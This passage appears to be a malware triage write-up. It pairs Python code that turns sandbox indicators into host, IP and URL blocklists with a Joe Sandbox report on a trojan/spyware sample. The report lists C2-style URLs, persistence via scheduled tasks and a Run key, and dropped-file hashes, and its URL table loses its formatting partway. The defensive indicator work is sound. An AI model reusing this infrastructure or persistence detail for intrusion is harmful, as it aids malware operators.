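# Contacted hosts that also carry legitimate traffic (my list, derived from the domain
# table): never host-block these, only an exact URL on them if one is flagged.
SHARED_INFRA = {"cdn.discordapp.com", "bit.ly", "bitly.com", "www.mediafire.com",
                "transfer.sh", "vk.com", "mstdn.social", "qoto.org", "goo.su"}


def _host(url: str) -> str:
    return urlsplit(url).hostname or ""


def _is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def build_blocklist(urls, domains, include_unrated=False):
    """Return {"hosts", "ips", "urls"} sets. By default only rows the report marks
    Malicious=true are used; include_unrated=True also takes rows the reputation feeds
    passed (e.g. 185.7.214.239/sqlite3.dll), which the sandbox saw dropped binaries fetch."""
    hosts, block_urls = set(), set()
    for ioc in urls:
        if not (ioc.malicious or include_unrated):
            continue
        block_urls.add(ioc.url)
        host = _host(ioc.url)
        if host in SHARED_INFRA:
            continue            # URL-level block only for shared services
        hosts.add(host)
    ips = {h for h in hosts if _is_ip(h)}
    ips |= {ip for name, ip in domains if name in hosts}   # resolve blocked names
    return {"hosts": hosts, "ips": ips, "urls": block_urls}


def related_domains(domains, blocklist):
    """Report domains resolving to an already-blocked IP that were not blocked themselves.
    These are leads, not verdicts: on shared hosting one IP serves unrelated sites."""
    return sorted(name for name, ip in domains
                  if ip in blocklist["ips"] and name not in blocklist["hosts"])


def match_log(lines, blocklist):
    """Check log lines of the constructed form '<ts> <client> <method> <url>'.
    Exact URL hits are reported as 'url', host/IP hits as 'host'."""
    hits = []
    for line in lines:
        url = line.split()[-1]
        host = _host(url)
        if url in blocklist["urls"]:
            hits.append((line, "url"))
        elif host in blocklist["hosts"] or host in blocklist["ips"]:
            hits.append((line, "host"))
    return hits


# Constructed log lines, not from the report.
SAMPLE_LOG = [
    "2022-01-04T10:01:12Z 10.0.0.5 GET http://65.108.180.72/mozglue.dll",
    "2022-01-04T10:01:13Z 10.0.0.5 GET http://65.108.180.72/nss3.dll",
    "2022-01-04T10:02:40Z 10.0.0.9 GET https://cdn.discordapp.com/attachments/1/2/setup.exe",
    "2022-01-04T10:03:01Z 10.0.0.9 GET http://185.7.214.239/sqlite3.dll",
]

if __name__ == "__main__":
    bl = build_blocklist(REPORT_URLS, REPORT_DOMAINS)
    print("hosts:", sorted(bl["hosts"]))
    print("related:", related_domains(REPORT_DOMAINS, bl))
    for line, why in match_log(SAMPLE_LOG, bl):
        print(why, line)
```

Run as-is, the default blocklist catches the exact mozglue.dll URL and the second request to 65.108.180.72 (a path the report never lists, caught at host level), ignores the Discord CDN line, and misses the sqlite3.dll fetch; only `include_unrated=True` adds 185.7.214.239. The pivot returns host-data-coin-11.com, which shares 89.223.65.17 with the two blocked domains but has no flagged URL of its own in the report.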

URLs from Memory and Binaries

Name | Source (process, memory dump) | Malicious | Antivirus Detection | Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text | CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct | CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk | CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | false | (none) | high
http://tempuri.org/Entity/Id12Response | CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp; svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmp | false | (none) | high
https://t.me/capibar | 4187.exe, 0000002A.00000002.553213817.0000000000ADD000.00000004.00000001.sdmp; 4187.exe, 0000002A.00000002.553183370.0000000000AC8000.00000004.00000001.sdmp | false | (none) | high
http://tempuri.org/ | CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp; CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id2Response | CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1 | CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | false | (none) | high
http://tempuri.org/Entity/Id21Response | CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap | CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | false | (none) | high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID | CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret | CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted | CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmp | false |
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Entity/Id15ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://api.ip.sb/ipCBA.exe, 00000013.00000002.408243360.0000000004121000.00000004.00000001.sdmp, CBA.exe, 00000021.00000000.402116569.0000000000402000.00000040.00000001.sdmp, CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://91.219.236.18/capibarl4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmptrue
                                                                                                                • Avira URL Cloud: phishing
                                                                                                                unknown
                                                                                                                http://crl.ver)svchost.exe, 00000004.00000002.594562074.0000020254C62000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                low
                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id24ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressingCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://dynamic.tsvchost.exe, 00000007.00000003.305141180.000001A732064000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tempuri.org/Entity/Id5ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305687704.000001A73205C000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000007.00000003.305193025.000001A73205A000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://tempuri.org/Entity/Id10ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RenewCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://tempuri.org/Entity/Id8ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000007.00000003.305173517.000001A732061000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://194.180.174.41/4187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentityCBA.exe, 00000021.00000002.632885407.0000000003540000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://91.219.236.148/capibarN4187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/06/addressingexCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000007.00000003.283449741.000001A732031000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://91.219.236.148/capibarl4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://tempuri.org/Entity/Id13ResponseCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000007.00000002.305659800.000001A73203C000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://91.219.236.148/capibarg4187.exe, 0000002A.00000002.602443827.0000000002755000.00000004.00000001.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                http://91.219.236.18/34187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmptrue
                                                                                                                                                                                • Avira URL Cloud: phishing
                                                                                                                                                                                unknown
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTCBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://194.180.174.53/capibar04187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmptrue
                                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousCBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpfalse

Contacted IPs



Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 547895
Start date: 04.01.2022
Start time: 19:31:08
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 9s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: nkINykHreE.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 49
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@57/40@107/34
EGA Information: Failed
HDC Information:
• Successful, ratio: 26.6% (good quality ratio 19.6%)
• Quality average: 58%
• Quality standard deviation: 40.4%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 74%
                                                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Adjust boot time
                                                                                                                                                                                                        • Enable AMSI
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        Warnings:
                                                                                                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 23.213.168.66, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, elew3le3lanle.freeddns.org, store-images.s-microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, microsoft.com, prod.fs.microsoft.com.akadns.net
                                                                                                                                                                                                        • Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                        Time     | Type            | Description
                                                                                                                                                                                                        19:32:13 | API Interceptor | 3x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                        19:32:47 | Task Scheduler  | Run new task: Firefox Default Browser Agent 57D5564316429876 path: C:\Users\user\AppData\Roaming\haifbcd
                                                                                                                                                                                                        19:33:27 | Task Scheduler  | Run new task: Firefox Default Browser Agent FA0C4CD8D97D977B path: C:\Users\user\AppData\Roaming\scifbcd
                                                                                                                                                                                                        19:33:28 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                                                                                        19:33:36 | API Interceptor | 1x Sleep call for process: 2757.exe modified
                                                                                                                                                                                                        19:33:56 | API Interceptor | 2x Sleep call for process: 4187.exe modified
                                                                                                                                                                                                        19:34:25 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Music "C:\Users\user\AppData\Roaming\Music\Music.exe"
                                                                                                                                                                                                        19:34:36 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Music "C:\Users\user\AppData\Roaming\Music\Music.exe"

                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                        IPs

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Domains

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        ASN

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:MPEG-4 LOAS
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                        Entropy (8bit):0.24857862142789358
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU42:BJiRdwfu2SRU42
                                                                                                                                                                                                        MD5:2A0ECA1698DAC02C685F470FF624FF73
                                                                                                                                                                                                        SHA1:B8250FAB9FE7DC4BD428779AF392893D157C4AD6
                                                                                                                                                                                                        SHA-256:B6B4013F5FCDA7AF3F4D249B6DB3B491BA688EE1F0D8BF49FF9BB9B77C8A7A59
                                                                                                                                                                                                        SHA-512:607FB01FE53B1D424D39DF6C67F5CBE569F9F678DC9E434EDC69FE26D5BD392EF4F8C10542268246241441AE6A30B53E4E7E7270EEBC76E41BAAFB55685DDF31
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x250ef644, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):786432
                                                                                                                                                                                                        Entropy (8bit):0.25059013638213035
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:0+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:LSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                                                                                        MD5:599F97CEA152346091DED811F2AC97D0
                                                                                                                                                                                                        SHA1:90BE68D3225D157ABACA71817F0796E8A9D93FA6
                                                                                                                                                                                                        SHA-256:B5E37DA5E782434B72D3F7F6B763751950450DBA3D94B9F92FB5EAEC40430A3E
                                                                                                                                                                                                        SHA-512:AF9E5BE4EAF0FE3B8BFEB440A6D49D1D18B0E2E2883236D6701C6B8A90A91D186B7F00AABB9A3F34E089358826D48D871BABFC29CC8FCE7CC3CB14E4445850D0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: %..D... ................e.f.3...w........................&..........w... ...zu.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................X..R. ...zu.................iG.G. ...zu.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                        Entropy (8bit):0.07509385199835537
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Am17Evrc88l/bJdAtiPIF1All3Vkttlmlnl:D1i38t4M41A3
                                                                                                                                                                                                        MD5:641F90FED18A8DC34616C7FB5B02935E
                                                                                                                                                                                                        SHA1:A8E7391E4C41BC5821C336DE2CD26E4C24799685
                                                                                                                                                                                                        SHA-256:033E0B5558CE302B744B7F2608DF9D1DD114B5B932D7FD8B2F0EB89994910CF1
                                                                                                                                                                                                        SHA-512:8CE75AF915AB2B478CFA029CC73961730CA528082DE7645597C9959F0E49016421BB08885C0099CCC49D4CE02849EEBC4F731B72CB8542DE0D9F22DC57DDBFE4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: O........................................3...w... ...zu......w...............w.......w....:O.....w..................iG.G. ...zu.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\ProgramData\sqlite3.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
Size (bytes):645592
Entropy (8bit):6.50414583238337
Encrypted:false
SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5:E477A96C8F2B18D6B5C27BDE49C990BF
SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CBA.exe.log
Process:C:\Users\user\AppData\Local\Temp\CBA.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):700
Entropy (8bit):5.346524082657112
Encrypted:false
SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
MD5:65CF801545098D915A06D8318D296A01
SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
Malicious:false
Reputation:unknown
